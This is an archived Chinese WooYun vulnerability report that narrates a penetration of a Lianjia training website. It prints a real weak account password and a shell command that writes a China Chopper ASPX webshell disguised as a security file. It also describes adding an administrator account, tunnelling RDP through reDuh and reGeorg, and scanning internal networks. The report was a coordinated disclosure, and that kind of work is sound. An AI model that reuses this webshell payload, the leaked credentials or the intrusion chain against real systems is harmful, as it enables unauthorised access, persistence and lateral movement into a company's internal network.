当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0136454

漏洞标题:链家某站由一个弱口令导致一次简单内网漫游(修复不彻底)

相关厂商:homelink.com.cn

漏洞作者: PythonPig

提交时间:2015-08-24 12:04

修复时间:2015-10-09 14:26

公开时间:2015-10-09 14:26

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-24: 细节已通知厂商并且等待厂商处理中
2015-08-25: 厂商已经确认,细节仅向厂商公开
2015-09-04: 细节向核心白帽子及相关领域专家公开
2015-09-14: 细节向普通白帽子公开
2015-09-24: 细节向实习白帽子公开
2015-10-09: 细节向公众公开

简要描述:

链家某站由一个弱口令导致一次简单内网漫游(修复不彻底)

详细说明:

听说链家换了新的运维,看了下以前的漏洞,修复的修复,下线的下线,网站安全水平提高了不少。不过人都有惰性,再检查一下特别的地方。
前两天本想简单在http://119.254.70.128这个站测试下字典的,就在以前的漏洞中找了几个用户名,还真有不少弱口令。Wooyun搜索了一下这个站,以前爆过漏洞,看到以前注入、上传等各种问题,手贱测试了下,上传没成功,手工没注入时,返回是下面的样子,看来是都修复了啊。

绝对路径-漏洞修复前后代码对比副本.jpg


在上图中可以清楚的看到是如何修复的,又测试了几个wooyun以前爆出的漏洞(大多是类型UniqNo的注入),都是按相同的方式修复了。
后来又蛋疼登陆到了一个账号,10009541:123456,发现登陆后可操作的内容不同啊,几个账号对比了一下,这个原来是个主管啊,这个时候就觉得,运维同学是不是把一般操作的漏洞修复了,这种特权人士的特权操作是不是还会存在问题?
主管的权限是大些啊,可以修改、查看他人各种信息。

泄漏信息.PNG


随便找了个点测试下,如下图在讲师信息管理模块,搜索框存在注入啊。

注入点查找.PNG


丢sqlmap里,一会再来看,如下图

注入成功.PNG


有注入,不急着跑数据,先看看权限,MSSQL,DBA权限,再看看xp_cmdshell是否可用,发现可用,那想到直接写文件吧,write-file过程中,连接很不稳定,而且执行很慢,最后也没写成功。干脆直接点,os-shell,原谅我的暴力~~虽然执行的也非常慢,但最终还是可以执行命令了。
查看权限

is-dba.PNG


绝对路径从哪里来?方法太多了,各显神通吧,通过以前的漏洞,也可以通过下面的图,我还是觉得这样简单:

绝对路径副本.jpg


os-shell执行命令吧:

echo ^<%@ Page Language="Jscript"%^>^<%eval(Request.Item["chopper"],"unsafe");%^>>F:\TrainingCenter_Prod\Programs\Superagent\360safe.aspx


os-shell写入文件.PNG


测试是否写成功了,访问不存在的文件时

访问不存在的文件.PNG


访问刚上传的马儿时

上传成功.PNG


写入成功,上刀,拿到webshell了

菜刀.PNG


看了看网络配置,内网

ipconfig.PNG


想着连3389看看吧,拿出reDuh简单试下。端口反弹回来了,结果想起来没有账号~~~,权限不够添加用户,看了下系统信息:Windows Server 2008 R2,一下就想到了这个系统有几个可以提权的漏洞,无奈手上没有exp,网上找了几个,都提权失败,看来这系统还是修复过了吧。
突然觉得我的脑袋小时候被驴踢过,webshell权限不够,干嘛非要在这里吊死?MSSQL的权限可以够的啊,还是直接暴力的使用os-shell,虽然没有回显,但是简单用下还是可以的。添加用户、提升权限。

添加用户、提升权限.PNG


然后使用reDuh,虽然慢了点,在win下还用还是很方便的。

reduh.PNG


reduh本地nc.PNG


顺利登陆,简单的证明下,坏事没干,为便于审核测试,账号没删,请自行删除。admin:admin123

远程桌面3.PNG


已经是内网了

远程桌面副本5.jpg


再看看能不能渗透下其他内网机器,这个webserver本身就有内网ip,看来有戏。reDuh感觉还是有点慢,用reGeorg试下,上传tunnel.aspx,连接,用nmap简单的扫了下172.16.5.0/24,然后又看了下以前的漏洞,发现172.165.0.0/21范围内的都可以访问。

内网.JPG


点到为止吧。
另外,http://119.254.70.128首页登陆的地方存在万能密码没有修复

漏洞证明:

见 详细说明

修复方案:

版权声明:转载请注明来源 PythonPig@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-08-25 14:24

厂商回复:

确认,谢谢。

最新状态:

暂无


漏洞评价:

评论

  1. 2015-08-24 12:04 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    高管带来的风险?

  2. 2015-08-24 12:25 | PythonPig ( 普通白帽子 | Rank:491 漏洞数:71 | 只会简单工具的小小菜)

    @疯狗 高管弱口令+高管的特权操作漏洞较隐蔽,不易被修复

  3. 2015-08-24 13:57 | 默之 ( 普通白帽子 | Rank:350 漏洞数:71 | 沉淀。)

    你才是大牛,昨天还找我,哈哈

  4. 2015-08-24 14:06 | PythonPig ( 普通白帽子 | Rank:491 漏洞数:71 | 只会简单工具的小小菜)

    @默之 感谢大牛提供思路,刚开始脑子一根筋,一直在想着win2008提权,其实换个思路,权限就有了,zone感谢大牛@默之

  5. 2015-08-24 14:16 | 默之 ( 普通白帽子 | Rank:350 漏洞数:71 | 沉淀。)

    @PythonPig 不要再逗我了,我真的是个菜…

  6. 2015-08-24 14:24 | Chora ( 普通白帽子 | Rank:337 漏洞数:22 | 生存、生活、生命。)

    赞一个隔壁的小伙伴,有空来隔壁耍。